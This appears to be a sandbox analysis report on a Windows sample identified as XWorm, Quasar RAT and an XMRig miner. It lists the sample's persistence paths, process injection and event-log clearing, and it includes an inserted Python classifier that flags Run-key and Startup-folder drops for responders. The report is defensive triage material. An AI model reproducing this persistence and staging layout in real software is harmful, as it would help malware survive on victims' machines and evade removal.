Analysis Overview
SHA256: fdcf99d6435929609f8d5625e4d24357bdc3949d9336901fa0daa7c494284a75
Threat Level: Known bad
The file primate protocol.exe was found to be: Known bad.
Malicious Activity Summary
xmrig
Suspicious use of NtCreateUserProcessOtherParentProcess
Xworm
Xworm family
Xmrig family
Quasar payload
Detect Xworm Payload
Quasar RAT
Quasar family
XMRig Miner payload
Creates new service(s)
Stops running service(s)
Command and Scripting Interpreter: PowerShell
Executes dropped EXE
Indicator Removal: Clear Windows Event Logs
Drops startup file
Checks computer location settings
Reads user/profile data of web browsers
Checks BIOS information in registry
Obfuscated Files or Information: Command Obfuscation
Adds Run key to start application
Suspicious use of SetThreadContext
Sets desktop wallpaper using registry
Drops file in System32 directory
UPX packed file
Drops file in Windows directory
Launches sc.exe
System Location Discovery: System Language Discovery
Event Triggered Execution: Netsh Helper DLL
Unsigned PE
Browser Information Discovery
System Network Configuration Discovery: Wi-Fi Discovery
Enumerates physical storage devices
Suspicious use of WriteProcessMemory
Modifies data under HKEY_USERS
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Uses Task Scheduler COM API
Suspicious use of AdjustPrivilegeToken
Scheduled Task/Job: Scheduled Task
Checks SCSI registry key(s)
Suspicious use of UnmapMainImage
Modifies registry class
Suspicious behavior: EnumeratesProcesses
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Delays execution with timeout.exe
Modifies Internet Explorer settings
Suspicious behavior: AddClipboardFormatListener
Suspicious use of SetWindowsHookEx
Suspicious behavior: GetForegroundWindowSpam
Enumerates system info in registry
Checks processor information in registry
MITRE ATT&CK
Analysis: static1
Detonation Overview
Reported: 2025-05-03 16:16
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted: 2025-05-03 16:15
Reported: 2025-05-03 16:18
Platform: win10v2004-20250502-en
Max time kernel: 133s
Max time network: 149s
Command Line
Signatures
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Quasar RAT
Quasar family
Quasar payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 4480 created 616 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\system32\winlogon.exe |
| PID 5052 created 616 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\system32\winlogon.exe |
Xmrig family
Xworm
Xworm family
xmrig
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Creates new service(s)
Stops running service(s)
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1153236273-2212388449-1493869963-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\primate protocol.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1153236273-2212388449-1493869963-1000\Control Panel\International\Geo\Nation | C:\Windows\CompPkg.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1153236273-2212388449-1493869963-1000\Control Panel\International\Geo\Nation | C:\Windows\systemprocess.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CompPkg.exe | C:\Windows\CompPkg.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CompPkg.exe | C:\Windows\CompPkg.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\systemprocess.exe | N/A |
| N/A | N/A | C:\Windows\host.exe | N/A |
| N/A | N/A | C:\Windows\CompPkg.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\CompPkg.exe | N/A |
| N/A | N/A | C:\ProgramData\czqnicouhgbl\ijujdfuujtjk.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\CompPkg.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\CompPkg.exe | N/A |
Indicator Removal: Clear Windows Event Logs
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Application-Experience%4Program-Compatibility-Assistant.evtx | C:\Windows\System32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Program-Compatibility-Assistant%4CompatAfterUpgrade.evtx | C:\Windows\System32\svchost.exe | N/A |
Reads user/profile data of web browsers
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1153236273-2212388449-1493869963-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\CompPkg = "C:\\Users\\Admin\\AppData\\Roaming\\CompPkg.exe" | C:\Windows\CompPkg.exe | N/A |
Obfuscated Files or Information: Command Obfuscation
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Tasks\Microsoft\Windows\Application Experience\PcaPatchDbTask | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 | C:\Windows\system32\svchost.exe | N/A |
Sets desktop wallpaper using registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1153236273-2212388449-1493869963-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ENC.img" | C:\Windows\CompPkg.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 5948 set thread context of 704 | N/A | C:\Windows\host.exe | C:\Windows\system32\dialer.exe |
| PID 1632 set thread context of 4492 | N/A | C:\ProgramData\czqnicouhgbl\ijujdfuujtjk.exe | C:\Windows\system32\dialer.exe |
| PID 1632 set thread context of 6036 | N/A | C:\ProgramData\czqnicouhgbl\ijujdfuujtjk.exe | C:\Windows\system32\dialer.exe |
| PID 1632 set thread context of 4832 | N/A | C:\ProgramData\czqnicouhgbl\ijujdfuujtjk.exe | C:\Windows\system32\dialer.exe |
| PID 4480 set thread context of 3148 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\System32\dllhost.exe |
| PID 5052 set thread context of 4500 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\System32\dllhost.exe |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\systemprocess.exe | C:\Users\Admin\AppData\Local\Temp\primate protocol.exe | N/A |
| File created | C:\Windows\host.exe | C:\Users\Admin\AppData\Local\Temp\primate protocol.exe | N/A |
| File created | C:\Windows\CompPkg.exe | C:\Users\Admin\AppData\Local\Temp\primate protocol.exe | N/A |
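Taken together, the "Drops startup file", "Adds Run key", "Sets desktop wallpaper" and "Drops file in Windows directory" tables give the sample's persistence and staging layout: three executables written directly under C:\Windows by the Temp dropper, a CompPkg.exe copy in the Startup folder, a Run value pointing at another copy in AppData\Roaming, and the wallpaper switched to a file in Temp. The classifier below is an added example for this page, not part of the sandbox report; it parses rows in the report's own table format and turns them into findings and a list of artifacts to collect. Several other rows in the report (svchost.exe touching .evtx files, browsers reading CPU and BIOS keys) are ordinary Windows activity captured alongside the sample, which is why the classifier keys on where files land and what paths registry values point to rather than on signature names. The two benign control rows and the rule names are constructed.

```python
"""Classifies the file-drop and registry rows in this report into
persistence and staging findings. Example code, runs offline on constructed
rows copied from the report's tables."""
import re
from pathlib import PureWindowsPath

DROPPER = r"C:\Users\Admin\AppData\Local\Temp\primate protocol.exe"
COMPPKG = r"C:\Windows\CompPkg.exe"
USER_HIVE = r"\REGISTRY\USER\S-1-5-21-1153236273-2212388449-1493869963-1000"

# (description, indicator, process) triples as printed in the report, plus
# two constructed benign rows as controls. Registry data keeps the report's
# doubled backslashes inside the quotes.
ROWS = [
    ("File created", r"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CompPkg.exe", COMPPKG),
    ("Set value (str)", USER_HIVE + r'\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\CompPkg = "C:\\Users\\Admin\\AppData\\Roaming\\CompPkg.exe"', COMPPKG),
    ("Set value (str)", USER_HIVE + r'\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\ENC.img"', COMPPKG),
    ("File created", r"C:\Windows\systemprocess.exe", DROPPER),
    ("File created", r"C:\Windows\host.exe", DROPPER),
    ("File created", COMPPKG, DROPPER),
    # Controls (constructed): PowerShell's own profile cache, and a Run entry into Program Files.
    ("File created", r"C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive",
     r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE"),
    ("Set value (str)", USER_HIVE + r'\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\VendorUpdater = "C:\\Program Files\\Vendor\\updater.exe"',
     r"C:\Program Files\Vendor\updater.exe"),
]

REG_SET = re.compile(r'^(?P<key>\\REGISTRY\\[^=]+?)\\(?P<name>[^\\=]+) = "(?P<data>.*)"$')
RUN_KEY = re.compile(r"\\software\\microsoft\\windows\\currentversion\\run(once)?$", re.I)
USER_WRITABLE = re.compile(r"^c:\\(users|programdata)\\", re.I)
TEMP_DIR = re.compile(r"\\appdata\\local\\temp\\", re.I)
STARTUP_DIR = re.compile(r"\\start menu\\programs\\startup\\", re.I)


def parse_reg_set(indicator):
    """Split 'key\\name = "data"' into (key, name, data), undoing the doubled
    backslashes the report prints inside the quoted data."""
    m = REG_SET.match(indicator)
    if not m:
        return None
    return m["key"], m["name"], m["data"].replace("\\\\", "\\")


def in_windows_root(path):
    # Executables directly under C:\Windows (not System32/SysWOW64) are rare for
    # legitimate software and are where this sample parks its copies.
    return str(PureWindowsPath(path).parent).lower() == r"c:\windows"


def classify(description, indicator, process):
    """Return (rule, subject, detail) tuples for one report row."""
    findings = []
    if description.startswith("Set value"):
        parsed = parse_reg_set(indicator)
        if parsed:
            key, name, data = parsed
            if RUN_KEY.search(key) and USER_WRITABLE.match(data):
                findings.append(("run_key_to_user_writable_path", name, data))
            if key.lower().endswith(r"\control panel\desktop") and name.lower() == "wallpaper" \
                    and TEMP_DIR.search(data):
                findings.append(("wallpaper_set_to_temp_file", name, data))
    elif description.startswith("File created"):
        if STARTUP_DIR.search(indicator):
            findings.append(("startup_folder_drop", indicator, process))
        if in_windows_root(indicator) and indicator.lower().endswith(".exe") and TEMP_DIR.search(process):
            findings.append(("exe_dropped_in_windows_root_by_temp_process", indicator, process))
    return findings


def triage(rows):
    out = []
    for desc, ind, proc in rows:
        for rule, subject, detail in classify(desc, ind, proc):
            out.append({"rule": rule, "subject": subject, "detail": detail, "process": proc})
    return out


def persistence_artifacts(rows):
    """Paths a responder should collect and remove: Run-key targets,
    Startup-folder files and the executables parked under C:\\Windows."""
    paths = set()
    for f in triage(rows):
        if f["rule"] == "run_key_to_user_writable_path":
            paths.add(f["detail"])
        elif f["rule"] in ("startup_folder_drop", "exe_dropped_in_windows_root_by_temp_process"):
            paths.add(f["subject"])
    return sorted(paths)


if __name__ == "__main__":
    for f in triage(ROWS):
        print(f["rule"], "->", f["subject"])
    print("collect:", *persistence_artifacts(ROWS), sep="\n  ")
```

The wallpaper rule is reported but deliberately kept out of the artifact list: the image is evidence, not a persistence mechanism. Note that the sample keeps three copies of CompPkg.exe (C:\Windows, the Startup folder, AppData\Roaming) and that the Run value points at the AppData one, so removing only the file the dropper wrote under C:\Windows leaves the persistence intact.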
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
| N/A | N/A | C:\Windows\system32\sc.exe | N/A |
Browser Information Discovery
Enumerates physical storage devices
Event Triggered Execution: Netsh Helper DLL
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\SYSTEM32\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\SYSTEM32\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh | C:\Windows\SYSTEM32\netsh.exe | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\primate protocol.exe | N/A |
System Network Configuration Discovery: Wi-Fi Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\netsh.exe | N/A |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Service | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\CompatibleIDs | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000\LogConf | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Mfg | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\ConfigFlags | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000\LogConf | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000 | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\HardwareID | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\CompatibleIDs | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\DeviceDesc | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Service | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\DeviceDesc | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Mfg | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key security queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier | C:\Windows\system32\wbem\wmiprvse.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1153236273-2212388449-1493869963-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" | C:\Windows\Explorer.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1153236273-2212388449-1493869963-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Windows\Explorer.EXE | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Uninstall | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Uninstall | C:\Windows\system32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
